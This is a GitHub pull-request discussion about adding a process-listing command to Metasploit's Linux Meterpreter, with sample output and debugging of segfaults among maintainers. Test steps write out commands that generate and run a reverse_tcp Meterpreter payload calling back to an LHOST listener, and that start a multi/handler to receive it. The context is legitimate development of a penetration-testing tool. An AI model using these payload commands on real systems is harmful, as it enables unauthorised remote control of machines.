ps support for linux meterpreter #250

Closed
wants to merge 1 commit into
from

Conversation

Projects
None yet
3 participants
Contributor

mephos commented Mar 20, 2012

sample :

meterpreter > ps

Process list

PID PPID Name User ID Path


1 0 init root init [2]
2 0 [kthreadd] root
3 2 [ksoftirqd/0] root
6 2 [migration/0] root
...
23165 23154 pager mm pager -s
23681 30938 bash mm bash
23942 1 chrome mm /opt/google/chrome/chrome
23947 23942 chrome mm /opt/google/chrome/chrome
30797 2671 bash mm -bash
31007 2 [ksoftirqd/2] root
31008 2 [watchdog/2] root
31009 2 [migration/3] root
31011 2 [ksoftirqd/3] root
31012 2 [watchdog/3] root
31077 395 udevd root udevd --daemon
31088 395 udevd root udevd --daemon
31295 30938 bash mm bash

jlee-r7 was assigned Mar 20, 2012

Contributor

jlee-r7 commented Mar 23, 2012

I'm getting segfaults, looking into the cause.

Contributor

jlee-r7 commented Mar 23, 2012

I think I would rather have the client side check for existence of columns instead of inferring based on platform.

Contributor

todb-r7 commented Mar 28, 2012

If this is segfaulting, we obviously can't merge. :) @mephos can you confirm?

Contributor

mephos commented Mar 28, 2012

strange, didn't segfault here (otherwise, wouldn't have commited it :) )
James, could you describe the tests you performed? anything in the log? (I removed almost all of the debug output before commiting so you might need to add some of them to see where it's segfaulting)

Contributor

mephos commented Apr 3, 2012

did a test with more or less the following commands and it worked without segfaulting :

git clone git@github.com:mephos/metasploit-framework.git
cd metasploit-framework/
git checkout ps-linux-meterpreter
git pull origin ps-linux-meterpreter
make -f external/source/meterpreter/Makefile

./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 R |./msfencode -t elf -o /tmp/meterpreter

./msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 E

Contributor

todb-r7 commented May 11, 2012

In looking into this, first problem was totally my fault, as I was working on x64 and things won't work there.

Brought up a 32-bit environment, got all my build dependencies in order, and ran through your suggested test sequence. Ended up with:

[1.9.3-p125] (mephos-ps) fakey@ubuntu:~/git/metasploit-framework$ ./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.145.1 R |./msfencode -t elf -o /tmp/meterpreter && chmod +x /tmp/meterpreter && /tmp/meterpreter
[*] x86/shikata_ga_nai succeeded with size 77 (iteration=1)

Segmentation fault

I see now that pull #250 (this one) is also a part of pull #254 , the sniffing patch. I also strongly suspect that both will conflict with pull #375 , @jlee-r7 's latest update to meterpreter.

Given the problems with source controlling binaries, can @jlee-r7 and @mephos work out what all needs to happen to get these three pull requests landed without stomping all over each other? I like the functionality and want that in, I just can't figure out how to make it all work together.

Contributor

mephos commented May 11, 2012

@todb-r7: dunno if you did it, but if you don't have a multi/handler waiting for connection, meterpreter will segfault as it cannot connect to a metasploit instance (it's not very clear in your test)

Contributor

jlee-r7 commented May 12, 2012

Working on consolidating here: https://github.com/jlee-r7/metasploit-framework/tree/consolidate-250-254-375

@mephos: Unicode filter stuff should be handled by the user with the disable_unicode_encoding command instead of in the ps command. See this commit 22751d9544c55f for what I think is a better way to do it. If you have objections to that, let me know.

Contributor

mephos commented May 13, 2012

Don't have much time right now to test, sorry

The problem about unicode decoding was that without it, string printing was messed up (even if my term locale was UTF-8)
I don't know about " disable_unicode_encoding", but what I wanted was good string printing out of the box.

If you think this will work, please go ahead with it, you have my blessing :)

What's the status of the patch in your branch? is it working correctly? is it broken by recent meterpreter changes?

jlee-r7 closed this in 5d7190e May 16, 2012

@jlee-r7 jlee-r7 pushed a commit to jlee-r7/metasploit-framework that referenced this pull request May 16, 2012

@egypt egypt Linux binaries for consolidation
This includes ps support, sniffer enhancements and the new loadlib API
changes.

[See #250][See #254][See #375]
f60429e

@jlee-r7 jlee-r7 added a commit that referenced this pull request May 17, 2012

@jlee-r7 jlee-r7 Merge pull request #390 from jlee-r7/consolidate-250-254-375
Consolidate #250, #254, #375
fe7928c
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment